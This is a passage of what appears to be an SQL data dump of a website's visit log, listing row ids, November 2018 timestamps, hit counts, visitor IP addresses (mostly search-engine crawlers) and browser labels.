0,'54.36.149.11','other'),(340253,1543075421,1,1,0,0,'178.154.244.11','other'),(340254,1543075748,1,1,0,0,'54.36.148.88','other'),(340255,1543075808,1,1,0,0,'54.36.148.33','other'),(340256,1543076810,1,1,0,0,'46.229.168.129','other'),(340257,1543076871,1,1,0,0,'66.249.66.59','chrome'),(340258,1543076872,2,2,0,0,'66.249.66.44','chrome'),(340259,1543077061,1,1,0,0,'54.36.148.251','other'),(340260,1543077507,2,2,0,0,'91.196.178.79','firefox'),(340261,1543077534,1,1,0,0,'66.249.66.155','chrome'),(340262,1543077535,1,1,0,0,'66.249.66.154','chrome'),(340263,1543077639,2,2,0,0,'46.211.25.66','chrome'),(340264,1543077687,1,1,0,0,'54.36.149.55','other'),(340265,1543077784,1,1,0,0,'54.36.149.40','other'),(340266,1543077918,1,1,0,0,'66.249.66.42','chrome'),(340267,1543077965,1,1,0,0,'37.115.222.194','firefox'),(340268,1543078065,1,1,0,0,'46.229.168.150','other'),(340269,1543078156,1,1,0,0,'40.77.167.162','other'),(340270,1543078289,1,1,0,0,'5.45.207.19','other'),(340271,1543078293,1,1,0,0,'87.250.224.65','other'),(340272,1543078297,1,1,0,0,'141.8.142.108','other'),(340273,1543078311,1,1,0,0,'87.250.224.64','other'),(340274,1543078313,1,1,0,0,'141.8.132.16','other'),(340275,1543078546,1,1,0,0,'54.36.148.165','other'),(340276,1543078801,1,1,0,0,'54.36.149.31','other'),(340277,1543079001,1,1,0,0,'54.36.149.79','other'),(340278,1543079229,1,1,0,0,'40.77.167.162','other'),(340279,1543079239,1,1,0,0,'66.249.66.156','chrome'),(340280,1543079307,1,1,0,0,'54.36.148.223','other'),(340281,1543079380,1,1,0,0,'54.36.148.240','other'),(340282,1543079483,1,1,0,0,'54.36.148.69','other'),(340283,1543079537,1,1,0,0,'54.36.148.94','other'),(340284,1543079588,1,1,0,0,'46.229.168.149','other'),(340285,1543079590,1,1,0,0,'46.229.168.133','other'),(340286,1543079811,1,1,0,0,'54.36.148.217','other'),(340287,1543079837,1,1,0,0,'54.36.148.189','other'),(340288,1543079844,1,1,0,0,'8.29.198.27','other'),(340289,1543079938,2,2,0,0,'93.77.223.76','firefox'),(340290,1543080075,2,2,0,0,'91.209.11.236','other'),(340291,1543080262,1,1,0,0,'178.154.244.29','other'),(340292,1543081115,1,1,0,0,'54.36.148.36','other'),(340293,1543081340,1,1,0,0,'66.249.66.57','chrome'),(340294,1543081341,1,1,0,0,'66.249.66.42','chrome'),(340295,1543081364,2,2,0,0,'8.29.198.25','other'),(340296,1543081435,1,1,0,0,'54.36.148.100','other'),(340297,1543081701,1,1,0,0,'178.154.244.29','other'),(340298,1543082141,2,2,0,0,'40.77.167.162','other'),(340299,1543082391,1,1,0,0,'54.36.148.95','other'),(340300,1543082686,1,1,0,0,'54.36.148.140','other'),(340301,1543082761,1,1,0,0,'54.36.148.84','other'),(340302,1543082762,1,1,0,0,'46.229.168.139','other'),(340303,1543082912,1,1,0,0,'178.154.244.29','other'),(340304,1543083024,1,1,0,0,'54.36.148.154','other'),(340305,1543083133,1,1,0,0,'54.36.148.198','other'),(340306,1543083394,1,1,0,0,'40.77.167.175','other'),(340307,1543083421,1,1,0,0,'54.36.149.30','other'),(340308,1543083615,1,1,0,0,'54.36.148.42','other'),(340309,1543083810,1,1,0,0,'54.36.148.69','other'),(340310,1543083930,1,1,0,0,'54.36.148.133','other'),(340311,1543084221,1,1,0,0,'46.229.168.136','other'),(340312,1543084449,1,1,0,0,'54.36.148.104','other'),(340313,1543084528,1,1,0,0,'54.36.148.31','other'),(340314,1543085884,2,2,0,0,'66.249.66.155','chrome'),(340315,1543085885,1,1,0,0,'66.249.66.152','chrome'),(340316,1543086230,1,1,0,0,'66.249.66.156','chrome'),(340317,1543086236,1,1,0,0,'95.163.255.97','other'),(340318,1543086239,1,1,0,0,'95.163.255.95','other'),(340319,1543086331,1,1,0,0,'54.36.149.60','other'),(340320,1543086350,2,2,0,0,'95.163.255.98','other'),(340321,1543086356,1,1,0,0,'54.36.148.190','other'),(340322,1543086526,1,1,0,0,'54.36.148.88','other'),(340323,1543086527,1,1,0,0,'91.245.118.83','opera'),(340324,1543086608,1,1,0,0,'91.245.118.83','msie'),(340325,1543086663,1,1,0,0,'66.249.66.44','chrome'),(340326,1543086922,1,1,0,0,'66.249.66.154','chrome'),(340327,1543087022,1,1,0,0,'54.36.149.102','other'),(340328,1543087240,1,1,0,0,'54.36.148.107','other'),(340329,1543087394,1,1,0,0,'95.108.181.54','other'),(340330,1543087397,4,4,0,0,'178.154.244.11','other'),(340331,1543087438,8,8,0,0,'178.154.244.29','other'),(340332,1543087445,5,5,0,0,'5.45.207.79','other'),(340333,1543088114,1,1,0,0,'54.36.149.44','other'),(340334,1543088342,1,1,0,0,'178.154.244.29','other'),(340335,1543088343,1,1,0,0,'178.154.244.11','other'),(340336,1543088909,1,1,0,0,'54.36.148.20','other'),(340337,1543089059,1,1,0,0,'54.36.149.65','other'),(340338,1543089170,1,1,0,0,'46.229.168.142','other'),(340339,1543089281,1,1,0,0,'54.36.149.95','other'),(340340,1543089409,1,1,0,0,'54.36.148.76','other'),(340341,1543089492,1,1,0,0,'54.36.148.101','other'),(340342,1543089627,1,1,0,0,'54.36.148.187','other'),(340343,1543089717,1,1,0,0,'54.36.148.171','other'),(340344,1543089906,1,1,0,0,'46.229.168.138','other'),(340345,1543090111,1,1,0,0,'66.249.66.155','chrome'),(340346,1543090135,1,1,0,0,'66.249.66.154','chrome'),(340347,1543090230,1,1,0,0,'40.77.167.175','other'),(340348,1543090608,1,1,0,0,'54.36.148.60','other'),(340349,1543090679,1,1,0,0,'8.29.198.26','other'),(340350,1543090917,1,1,0,0,'46.211.46.242','chrome'),(340351,1543091071,1,1,0,0,'54.36.148.242','other'),(340352,1543091103,1,1,0,0,'54.36.148.121','other'),(340353,1543091186,1,1,0,0,'157.55.39.252','other'),(340354,1543091204,1,1,0,0,'66.249.66.156','chrome'),(340355,1543091239,1,1,0,0,'54.36.148.62','other'),(340356,1543091372,1,1,0,0,'46.229.168.135','other'),(340357,1543091378,1,1,0,0,'46.229.168.146','other'),(340358,1543091490,1,1,0,0,'66.249.66.154','chrome'),(340359,1543091776,1,1,0,0,'54.36.148.237','other'),(340360,1543091873,1,1,0,0,'95.163.255.93','other'),(340361,1543091877,1,1,0,0,'95.163.255.98','other'),(340362,1543092207,1,1,0,0,'8.29.198.27','other'),(340363,1543092350,1,1,0,0,'54.36.149.18','other'),(340364,1543092487,1,1,0,0,'54.36.148.25','other'),(340365,1543092556,1,1,0,0,'54.36.148.208','other'),(340366,1543092793,1,1,0,0,'178.154.244.29','other'),(340367,1543093007,1,1,0,0,'8.29.198.26','other'),(340368,1543093348,1,1,0,0,'54.36.148.59','other'),(340369,1543093625,1,1,0,0,'54.36.148.253','other'),(340370,1543094162,1,1,0,0,'54.36.149.101','other'),(340371,1543094270,1,1,0,0,'54.36.148.181','other'),(340372,1543094537,14,14,0,0,'5.9.70.72','other'),(340373,1543094653,7,7,0,0,'178.154.244.29','other'),(340374,1543094666,2,2,0,0,'178.154.244.11','other'),(340375,1543094677,1,1,0,0,'54.36.149.37','other'),(340376,1543094760,1,1,0,0,'141.8.142.108','other'),(340377,1543094886,2,2,0,0,'5.45.207.79','other'),(340378,1543094918,8,8,0,0,'207.180.224.141','other'),(340379,1543095209,1,1,0,0,'46.229.168.149','other'),(340380,1543095414,2,2,0,0,'91.242.162.40','other'),(340381,1543095494,2,2,0,0,'66.249.66.156','chrome'),(340382,1543095791,1,1,0,0,'66.249.66.157','chrome'),(340383,1543095792,1,1,0,0,'66.249.66.154','chrome'),(340384,1543095796,1,1,0,0,'54.36.148.81','other'),(340385,1543096170,1,1,0,0,'46.229.168.133','other'),(340386,1543096406,1,1,0,0,'178.255.215.94','other'),(340387,1543096635,1,1,0,0,'141.8.142.103','other'),(340389,1543096639,2,2,0,0,'178.154.244.11','other'),(340390,1543096727,1,1,0,0,'54.36.148.34','other'),(340391,1543096824,2,2,0,0,'40.77.167.162','other'),(340392,1543097198,1,1,0,0,'54.36.148.30','other'),(340393,1543097424,1,1,0,0,'157.55.39.252','other'),(340394,1543098092,1,1,0,0,'54.36.149.76','other'),(340395,1543098116,1,1,0,0,'54.36.148.235','other'),(340396,1543098194,1,1,0,0,'46.229.168.148','other'),(340397,1543098197,1,1,0,0,'46.229.168.142','other'),(340398,1543098547,1,1,0,0,'54.36.149.90','other'),(340399,1543098812,1,1,0,0,'54.36.148.75','other'),(340400,1543098813,1,1,0,0,'54.36.148.115','other'),(340401,1543098831,1,1,0,0,'54.36.148.245','other'),(340402,1543098902,1,1,0,0,'54.36.148.205','other'),(340403,1543099121,1,1,0,0,'54.36.148.82','other'),(340404,1543099238,1,1,0,0,'178.154.244.29','other'),(340405,1543099279,1,1,0,0,'40.77.167.162','other'),(340406,1543099285,1,1,0,0,'157.55.39.252','other'),(340407,1543099352,1,1,0,0,'54.36.148.72','other'),(340408,1543099483,1,1,0,0,'77.122.64.15','chrome'),(340409,1543099673,1,1,0,0,'54.36.149.73','other'),(340410,1543099816,1,1,0,0,'46.229.168.140','other'),(340411,1543100027,1,1,0,0,'54.36.149.55','other'),(340412,1543100164,1,1,0,0,'54.36.149.56','other'),(340413,1543100657,1,1,0,0,'54.36.148.93','other'),(340414,1543100674,4,4,0,0,'66.249.66.152','chrome'),(340415,1543100816,1,1,0,0,'95.108.213.4','other'),(340416,1543100855,2,2,0,0,'5.45.207.79','other'),(340417,1543100858,4,4,0,0,'178.154.244.29','other'),(340418,1543100911,2,2,0,0,'178.154.244.11','other'),(340419,1543101074,1,1,0,0,'87.250.224.47','other'),(340420,1543101115,1,1,0,0,'66.249.66.156','chrome'),(340421,1543101305,1,1,0,0,'54.36.148.86','other'),(340422,1543101518,1,1,0,0,'8.29.198.26','other'),(340423,1543101538,1,1,0,0,'66.249.66.155','chrome'),(340424,1543101734,1,1,0,0,'54.36.149.24','other'),(340425,1543101965,1,1,0,0,'66.249.66.44','chrome'),(340426,1543101969,1,1,0,0,'54.36.149.63','other'),(340427,1543102195,1,1,0,0,'54.36.148.130','other'),(340428,1543102264,1,1,0,0,'54.36.148.125','other'),(340429,1543102521,1,1,0,0,'54.36.148.83','other'),(340430,1543102637,1,1,0,0,'220.243.135.79','chrome'),(340431,1543102739,1,1,0,0,'54.36.148.233','other'),(340432,1543102799,1,1,0,0,'95.163.255.97','other'),(340433,1543102801,1,1,0,0,'95.163.255.92','other'),(340434,1543103043,1,1,0,0,'13.57.233.99','chrome'),(340435,1543103049,2,2,0,0,'8.29.198.26','other'),(340436,1543103292,1,1,0,0,'54.36.148.197','other'),(340437,1543103537,2,2,0,0,'178.154.244.29','other'),(340438,1543103541,1,1,0,0,'54.36.149.67','other'),(340439,1543103661,1,1,0,0,'66.249.66.152','chrome'),(340440,1543103832,1,1,0,0,'40.77.167.175','other'),(340441,1543103882,1,1,0,0,'66.249.66.155','chrome'),(340443,1543103889,1,1,0,0,'54.36.149.86','other'),(340444,1543103920,1,1,0,0,'95.163.255.159','other'),(340445,1543103922,1,1,0,0,'95.163.255.156','other'),(340446,1543103958,1,1,0,0,'95.163.255.162','other'),(340447,1543103960,1,1,0,0,'95.163.255.191','other'),(340448,1543104062,1,1,0,0,'87.250.224.47','other'),(340449,1543104092,1,1,0,0,'178.154.244.11','other'),(340450,1543104171,1,1,0,0,'54.36.149.85','other'),(340451,1543104188,1,1,0,0,'54.36.148.70','other'),(340452,1543104192,1,1,0,0,'54.36.149.94','other'),(340453,1543104686,1,1,0,0,'54.36.148.214','other'),(340454,1543104692,1,1,0,0,'54.36.148.229','other'),(340455,1543104771,1,1,0,0,'157.55.39.252','other'),(340456,1543104792,1,1,0,0,'54.36.148.152','other'),(340457,1543104866,1,1,0,0,'54.36.149.98','other'),(340458,1543104947,1,1,0,0,'46.229.168.154','other'),(340459,1543104949,1,1,0,0,'46.229.168.142','other'),(340460,1543105400,1,1,0,0,'54.36.148.244','other'),(340461,1543105687,1,1,0,0,'54.36.148.183','other'),(340462,1543105767,1,1,0,0,'54.36.148.144','other'),(340463,1543105998,1,1,0,0,'54.36.148.226','other'),(340464,1543106003,1,1,0,0,'54.36.148.96','other'),(340465,1543106040,9,9,0,0,'178.154.244.29','other'),(340466,1543106085,4,4,0,0,'178.154.244.11','other'),(340467,1543106458,1,1,0,0,'207.46.13.252','other'),(340468,1543106526,1,1,0,0,'66.249.66.157','chrome'),(340469,1543106536,1,1,0,0,'66.249.66.152','chrome'),(340470,1543106701,1,1,0,0,'46.229.168.149','other'),(340471,1543106984,1,1,0,0,'54.36.148.136','other'),(340472,1543107327,1,1,0,0,'54.36.149.14','other'),(340473,1543107475,1,1,0,0,'54.36.148.139','other'),(340474,1543107556,1,1,0,0,'54.36.149.39','other'),(340475,1543107598,1,1,0,0,'54.36.149.17','other'),(340476,1543107765,1,1,0,0,'54.36.149.64','other'),(340477,1543107833,1,1,0,0,'46.229.168.145','other'),(340478,1543107835,1,1,0,0,'46.229.168.135','other'),(340479,1543107886,1,1,0,0,'54.36.148.61','other'),(340480,1543107902,1,1,0,0,'54.36.149.57','other'),(340481,1543107997,1,1,0,0,'40.77.167.195','other'),(340482,1543108049,1,1,0,0,'40.77.167.175','other'),(340483,1543108239,1,1,0,0,'66.249.66.152','chrome'),(340484,1543108316,1,1,0,0,'95.163.255.95','other'),(340485,1543108318,1,1,0,0,'95.163.255.96','other'),(340486,1543108529,1,1,0,0,'54.36.148.167','other'),(340487,1543108594,1,1,0,0,'54.36.148.16','other'),(340488,1543108960,1,1,0,0,'54.36.148.156','other'),(340489,1543109352,1,1,0,0,'40.77.167.162','other'),(340490,1543109650,1,1,0,0,'95.163.255.163','other'),(340491,1543109653,1,1,0,0,'95.163.255.175','other'),(340492,1543109851,1,1,0,0,'54.36.149.57','other'),(340493,1543109904,1,1,0,0,'54.36.149.2','other'),(340494,1543109907,1,1,0,0,'54.36.148.164','other'),(340495,1543109987,1,1,0,0,'66.249.66.155','chrome'),(340496,1543110004,1,1,0,0,'66.249.66.152','chrome'),(340497,1543110068,1,1,0,0,'54.36.149.14','other'),(340498,1543110112,1,1,0,0,'54.36.148.116','other'),(340499,1543110342,1,1,0,0,'54.36.148.34','other'),(340500,1543110473,1,1,0,0,'54.36.148.240','other'),(340501,1543111059,1,1,0,0,'54.36.148.177','other'),(340502,1543111320,1,1,0,0,'54.36.149.99','other'),(340503,1543111328,2,2,0,0,'46.229.168.141','other'),(340504,1543111488,1,1,0,0,'54.36.148.107','other'),(340505,1543111568,1,1,0,0,'95.108.213.4','other'),(340506,1543111595,1,1,0,0,'54.36.149.50','other'),(340507,1543111660,7,7,0,0,'178.154.244.29','other'),(340508,1543111842,1,1,0,0,'178.154.244.11','other'),(340509,1543112041,1,1,0,0,'54.36.148.135','other'),(340510,1543112347,1,1,0,0,'8.29.198.27','other'),(340511,1543112438,1,1,0,0,'54.36.148.209','other'),(340512,1543112571,1,1,0,0,'54.36.148.150','other'),(340513,1543112675,2,2,0,0,'54.36.149.62','other'),(340514,1543112825,1,1,0,0,'40.77.167.162','other'),(340515,1543113111,1,1,0,0,'54.36.148.80','other'),(340516,1543113163,1,1,0,0,'54.36.148.45','other'),(340517,1543113412,1,1,0,0,'66.249.66.152','chrome'),(340518,1543113522,1,1,0,0,'54.36.148.95','other'),(340519,1543113648,1,1,0,0,'95.163.255.95','other'),(340520,1543113650,1,1,0,0,'95.163.255.98','other'),(340521,1543113859,1,1,0,0,'54.36.149.56','other'),(340522,1543113902,2,2,0,0,'8.29.198.25','other'),(340523,1543113964,1,1,0,0,'54.36.148.83','other'),(340524,1543114564,1,1,0,0,'209.90.225.45','chrome'),(340525,1543114701,1,1,0,0,'54.36.148.172','other'),(340526,1543115155,1,1,0,0,'95.163.255.156','other'),(340527,1543115157,1,1,0,0,'95.163.255.191','other'),(340528,1543115270,1,1,0,0,'95.163.255.188','other'),(340529,1543115273,1,1,0,0,'95.163.255.163','other'),(340530,1543115284,1,1,0,0,'95.163.255.170','other'),(340531,1543115285,1,1,0,0,'80.252.154.233','firefox'),(340532,1543115287,1,1,0,0,'95.163.255.154','other'),(340533,1543115404,1,1,0,0,'54.36.148.86','other'),(340534,1543115533,1,1,0,0,'54.36.148.20','other'),(340535,1543115608,2,2,0,0,'54.202.132.116','chrome'),(340536,1543115625,1,1,0,0,'54.36.148.235','other'),(340537,1543115832,1,1,0,0,'54.36.148.82','other'),(340538,1543115895,1,1,0,0,'54.36.148.232','other'),(340539,1543116140,1,1,0,0,'54.36.148.230','other'),(340540,1543116236,1,1,0,0,'54.36.149.52','other'),(340541,1543116347,1,1,0,0,'54.36.148.67','other'),(340542,1543116357,1,1,0,0,'40.77.167.175','other'),(340543,1543116487,1,1,0,0,'54.36.148.66','other'),(340544,1543116490,1,1,0,0,'54.36.148.129','other'),(340545,1543116617,1,1,0,0,'66.249.66.154','chrome'),(340546,1543116750,1,1,0,0,'54.36.148.221','other'),(340547,1543117266,1,1,0,0,'46.229.168.138','other'),(340548,1543117268,2,2,0,0,'46.229.168.132','other'),(340549,1543117282,1,1,0,0,'54.36.148.67','other'),(340550,1543117452,3,3,0,0,'178.154.244.29','other'),(340551,1543117572,2,2,0,0,'178.154.244.11','other'),(340552,1543117656,1,1,0,0,'46.229.168.129','other'),(340553,1543117659,1,1,0,0,'46.229.168.135','other'),(340554,1543117663,1,1,0,0,'66.249.66.156','chrome'),(340555,1543117698,1,1,0,0,'5.45.207.19','other'),(340556,1543117903,1,1,0,0,'46.229.168.145','other'),(340557,1543117928,1,1,0,0,'54.36.148.194','other'),(340558,1543118391,1,1,0,0,'54.36.148.213','other'),(340559,1543118453,1,1,0,0,'54.36.148.210','other'),(340560,1543118465,1,1,0,0,'54.36.148.59','other'),(340561,1543118939,1,1,0,0,'54.36.148.134','other'),(340562,1543119039,1,1,0,0,'54.36.149.55','other'),(340563,1543119054,1,1,0,0,'178.154.244.29','other'),(340564,1543119065,1,1,0,0,'54.36.148.175','other'),(340565,1543119122,1,1,0,0,'46.229.168.145','other'),(340566,1543119134,1,1,0,0,'54.36.149.94','other'),(340567,1543119144,1,1,0,0,'54.36.148.124','other'),(340568,1543119191,1,1,0,0,'54.36.149.34','other'),(340569,1543119220,1,1,0,0,'54.36.148.112','other'),(340570,1543119332,1,1,0,0,'54.36.148.141','other'),(340571,1543119334,1,1,0,0,'95.163.255.95','other'),(340572,1543119337,1,1,0,0,'95.163.255.97','other'),(340573,1543119436,1,1,0,0,'157.55.39.252','other'),(340574,1543119640,1,1,0,0,'54.36.149.11','other'),(340575,1543119676,1,1,0,0,'54.36.149.64','other'),(340576,1543119702,1,1,0,0,'40.77.167.162','other'),(340577,1543119773,1,1,0,0,'54.36.148.164','other'),(340578,1543119783,1,1,0,0,'54.36.148.226','other'),(340579,1543119920,1,1,0,0,'66.249.66.40','chrome'),(340580,1543119937,1,1,0,0,'54.36.148.223','other'),(340581,1543120101,1,1,0,0,'54.36.148.243','other'),(340582,1543120603,1,1,0,0,'54.36.148.34','other'),(340583,1543120651,1,1,0,0,'66.249.66.42','chrome'),(340584,1543120662,1,1,0,0,'95.163.255.172','other'),(340585,1543120689,1,1,0,0,'66.249.66.156','chrome'),(340586,1543120731,1,1,0,0,'54.36.148.254','other'),(340587,1543121079,1,1,0,0,'54.36.148.247','other'),(340588,1543121157,1,1,0,0,'54.36.149.61','other'),(340589,1543121240,1,1,0,0,'54.36.148.221','other'),(340590,1543121378,1,1,0,0,'54.36.148.70','other'),(340591,1543121541,1,1,0,0,'54.36.149.58','other'),(340592,1543121576,1,1,0,0,'46.229.168.154','other'),(340593,1543121826,1,1,0,0,'54.36.148.168','other'),(340594,1543122081,1,1,0,0,'54.36.148.140','other'),(340595,1543122385,1,1,0,0,'54.36.148.89','other'),(340596,1543122447,1,1,0,0,'54.36.149.17','other'),(340597,1543122595,1,1,0,0,'87.250.224.118','other'),(340598,1543122609,2,2,0,0,'37.9.113.20','other'),(340599,1543122663,1,1,0,0,'54.36.148.143','other'),(340600,1543122759,2,2,0,0,'178.154.244.49','other'),(340602,1543122811,2,2,0,0,'178.154.244.29','other'),(340603,1543122819,1,1,0,0,'40.77.167.162','other'),(340604,1543122839,1,1,0,0,'213.180.203.9','other'),(340605,1543122857,1,1,0,0,'54.36.148.232','other'),(340606,1543122862,2,2,0,0,'178.154.200.48','other'),(340607,1543122865,1,1,0,0,'5.255.253.38','other'),(340608,1543122868,2,2,0,0,'178.154.171.27','other'),(340609,1543122875,1,1,0,0,'5.45.207.8','other'),(340610,1543122879,1,1,0,0,'178.154.244.11','other'),(340611,1543122886,1,1,0,0,'54.36.149.88','other'),(340612,1543122925,1,1,0,0,'95.108.181.75','other'),(340613,1543122943,1,1,0,0,'5.45.207.19','other'),(340614,1543122954,2,2,0,0,'95.108.213.4','other'),(340615,1543122980,2,2,0,0,'141.8.142.103','other'),(340616,1543122990,1,1,0,0,'213.180.203.40','other'),(340617,1543123192,1,1,0,0,'8.29.198.27','other'),(340618,1543123194,1,1,0,0,'93.158.166.7','other'),(340619,1543123195,1,1,0,0,'213.180.203.17','other'),(340620,1543123196,1,1,0,0,'87.250.224.107','other'),(340621,1543123672,1,1,0,0,'54.36.148.215','other'),(340622,1543123823,1,1,0,0,'54.36.148.162','other'),(340623,1543124262,1,1,0,0,'46.229.168.141','other'),(340624,1543124470,1,1,0,0,'95.163.255.94','other'),(340625,1543124742,1,1,0,0,'8.29.198.26','other'),(340626,1543124837,1,1,0,0,'54.36.148.40','other'),(340627,1543125100,1,1,0,0,'54.36.148.39','other'),(340628,1543125528,1,1,0,0,'8.29.198.27','other'),(340629,1543125535,1,1,0,0,'54.36.148.62','other'),(340630,1543125545,1,1,0,0,'54.36.148.22','other'),(340631,1543125799,1,1,0,0,'54.36.149.49','other'),(340632,1543125826,1,1,0,0,'54.36.148.138','other'),(340633,1543126141,1,1,0,0,'54.36.149.44','other'),(340634,1543126185,1,1,0,0,'66.249.66.44','chrome'),(340635,1543126243,1,1,0,0,'54.36.149.39','other'),(340636,1543126584,1,1,0,0,'46.229.168.135','other'),(340637,1543126617,1,1,0,0,'46.229.168.143','other'),(340638,1543127054,1,1,0,0,'54.36.148.146','other'),(340639,1543127347,1,1,0,0,'54.36.149.62','other'),(340640,1543127596,1,1,0,0,'54.36.149.76','other'),(340641,1543127642,1,1,0,0,'54.36.149.68','other'),(340642,1543127684,1,1,0,0,'66.249.66.42','chrome'),(340643,1543127833,2,2,0,0,'91.196.178.38','chrome'),(340644,1543128010,1,1,0,0,'54.36.148.131','other'),(340645,1543128291,1,1,0,0,'54.36.148.94','other'),(340646,1543128370,5,5,0,0,'178.154.244.29','other'),(340647,1543128464,3,3,0,0,'178.154.244.11','other'),(340648,1543128779,1,1,0,0,'54.36.149.0','other'),(340649,1543128805,1,1,0,0,'54.36.149.81','other'),(340650,1543128827,1,1,0,0,'54.36.148.83','other'),(340651,1543128830,1,1,0,0,'54.36.148.115','other'),(340652,1543129116,1,1,0,0,'66.249.66.154','chrome'),(340653,1543129125,1,1,0,0,'66.249.66.152','chrome'),(340654,1543129273,1,1,0,0,'54.36.148.137','other'),(340655,1543129387,1,1,0,0,'54.36.149.52','other'),(340656,1543129615,1,1,0,0,'66.249.66.61','chrome'),(340657,1543129616,1,1,0,0,'66.249.66.44','chrome'),(340658,1543129655,1,1,0,0,'54.36.148.40','other'),(340659,1543129695,1,1,0,0,'54.36.148.215','other'),(340660,1543129714,1,1,0,0,'54.36.148.99','other'),(340661,1543130156,1,1,0,0,'54.36.148.155','other'),(340662,1543130195,1,1,0,0,'54.36.148.245','other'),(340663,1543130265,1,1,0,0,'54.36.148.152','other'),(340664,1543130961,1,1,0,0,'54.36.148.20','other'),(340665,1543131109,1,1,0,0,'54.36.148.101','other'),(340666,1543131623,1,1,0,0,'46.229.168.140','other'),(340667,1543131645,1,1,0,0,'95.108.181.83','other'),(340668,1543131646,1,1,0,0,'95.108.213.50','other'),(340670,1543131648,1,1,0,0,'95.108.213.4','other'),(340671,1543131792,2,2,0,0,'91.196.178.134','firefox'),(340672,1543131864,1,1,0,0,'54.36.148.37','other'),(340673,1543131890,1,1,0,0,'54.36.148.239','other'),(340674,1543132058,1,1,0,0,'95.163.255.184','other'),(340675,1543132060,1,1,0,0,'95.163.255.155','other'),(340676,1543132160,1,1,0,0,'66.249.66.42','chrome'),(340677,1543132240,1,1,0,0,'178.167.68.43','chrome'),(340678,1543132364,1,1,0,0,'54.36.149.35','other'),(340679,1543132415,1,1,0,0,'178.154.244.29','other'),(340680,1543132533,1,1,0,0,'178.154.244.11','other'),(340681,1543132666,1,1,0,0,'54.36.149.2','other'),(340682,1543133239,1,1,0,0,'46.229.168.151','other'),(340683,1543133241,1,1,0,0,'46.229.168.129','other'),(340684,1543133847,1,1,0,0,'54.36.148.188','other'),(340685,1543133957,1,1,0,0,'66.249.66.156','chrome'),(340686,1543134024,1,1,0,0,'8.29.198.27','other'),(340687,1543134343,1,1,0,0,'46.229.168.135','other'),(340688,1543134346,1,1,0,0,'46.229.168.132','other'),(340689,1543134529,1,1,0,0,'46.229.168.154','other'),(340690,1543134562,1,1,0,0,'66.249.66.155','chrome'),(340691,1543134563,1,1,0,0,'66.249.66.152','chrome'),(340692,1543134775,5,5,0,0,'178.154.244.29','other'),(340693,1543134948,1,1,0,0,'87.250.224.64','other'),(340694,1543134960,1,1,0,0,'141.8.142.144','other'),(340695,1543134970,1,1,0,0,'37.9.113.148','other'),(340696,1543135020,1,1,0,0,'5.45.207.79','other'),(340697,1543135025,7,7,0,0,'178.154.244.11','other'),(340698,1543135233,1,1,0,0,'54.36.148.146','other'),(340699,1543135264,1,1,0,0,'40.77.167.162','other'),(340700,1543135415,2,2,0,0,'91.196.178.93','chrome'),(340701,1543135483,1,1,0,0,'95.163.255.99','other'),(340702,1543135486,1,1,0,0,'95.163.255.93','other'),(340703,1543135520,1,1,0,0,'95.163.255.95','other'),(340704,1543135521,1,1,0,0,'95.163.255.98','other'),(340705,1543135591,2,2,0,0,'8.29.198.26','other'),(340706,1543136306,1,1,0,0,'46.229.168.149','other'),(340707,1543136364,1,1,0,0,'54.36.148.193','other'),(340708,1543136670,1,1,0,0,'54.36.148.138','other'),(340709,1543137062,1,1,0,0,'54.36.148.152','other'),(340710,1543137070,1,1,0,0,'66.249.66.156','chrome'),(340711,1543137209,1,1,0,0,'54.36.148.168','other'),(340712,1543137394,1,1,0,0,'46.229.168.142','other'),(340713,1543137407,1,1,0,0,'95.163.255.192','other'),(340714,1543137410,1,1,0,0,'95.163.255.181','other'),(340715,1543137774,1,1,0,0,'95.163.255.159','other'),(340716,1543137777,1,1,0,0,'95.163.255.154','other'),(340717,1543138104,1,1,0,0,'54.36.148.59','other'),(340718,1543138587,1,1,0,0,'54.36.149.4','other'),(340719,1543139254,1,1,0,0,'54.36.148.142','other'),(340720,1543139352,1,1,0,0,'54.36.148.245','other'),(340721,1543139699,1,1,0,0,'54.36.148.249','other'),(340722,1543140148,1,1,0,0,'54.36.148.145','other'),(340723,1543140247,1,1,0,0,'54.36.148.59','other'),(340724,1543140306,1,1,0,0,'54.36.148.196','other'),(340725,1543140347,1,1,0,0,'54.36.148.169','other'),(340726,1543140427,2,2,0,0,'130.180.216.191','chrome'),(340727,1543140762,1,1,0,0,'54.36.149.93','other'),(340728,1543140771,1,1,0,0,'40.77.167.162','other'),(340729,1543141029,1,1,0,0,'95.163.255.95','other'),(340730,1543141033,1,1,0,0,'95.163.255.99','other'),(340731,1543141081,1,1,0,0,'95.108.213.4','other'),(340732,1543141485,3,3,0,0,'178.154.244.29','other'),(340733,1543142145,3,3,0,0,'178.154.244.11','other'),(340734,1543142334,1,1,0,0,'54.36.148.156','other'),(340735,1543142396,1,1,0,0,'40.77.167.85','other'),(340736,1543142664,1,1,0,0,'54.36.149.24','other'),(340737,1543142761,1,1,0,0,'54.36.149.37','other'),(340738,1543142792,1,1,0,0,'95.163.255.195','other'),(340739,1543142794,1,1,0,0,'95.163.255.150','other'),(340740,1543142892,2,2,0,0,'130.180.217.114','chrome'),(340741,1543143175,1,1,0,0,'54.36.148.238','other'),(340742,1543143524,1,1,0,0,'46.229.168.152','other'),(340743,1543143527,1,1,0,0,'46.229.168.134','other'),(340744,1543143984,6,6,0,0,'167.99.212.214','msie'),(340745,1543144020,1,1,0,0,'54.36.148.26','other'),(340746,1543144036,2,2,0,0,'54.36.148.69','other'),(340747,1543144041,1,1,0,0,'91.196.178.33','chrome'),(340748,1543144276,1,1,0,0,'66.249.66.154','chrome'),(340749,1543144319,1,1,0,0,'54.36.149.44','other'),(340750,1543144377,1,1,0,0,'54.36.149.78','other'),(340751,1543144856,1,1,0,0,'40.77.167.175','other'),(340752,1543144860,1,1,0,0,'8.29.198.27','other'),(340753,1543145167,1,1,0,0,'54.36.149.102','other'),(340754,1543145218,1,1,0,0,'54.36.149.72','other'),(340755,1543145540,1,1,0,0,'54.36.148.28','other'),(340756,1543146133,1,1,0,0,'54.36.148.169','other'),(340757,1543146144,1,1,0,0,'54.36.149.21','other'),(340758,1543146428,1,1,0,0,'8.29.198.26','other'),(340759,1543146616,3,3,0,0,'5.45.207.19','other'),(340760,1543146626,1,1,0,0,'54.36.149.49','other'),(340761,1543146664,4,4,0,0,'178.154.244.11','other'),(340762,1543146745,3,3,0,0,'5.45.207.79','other'),(340763,1543146746,1,1,0,0,'66.249.66.156','chrome'),(340764,1543146762,2,2,0,0,'178.154.244.29','other'),(340765,1543146838,1,1,0,0,'95.163.255.96','other'),(340766,1543146841,1,1,0,0,'95.163.255.94','other'),(340767,1543146870,1,1,0,0,'141.8.142.103','other'),(340768,1543147003,1,1,0,0,'87.250.224.65','ot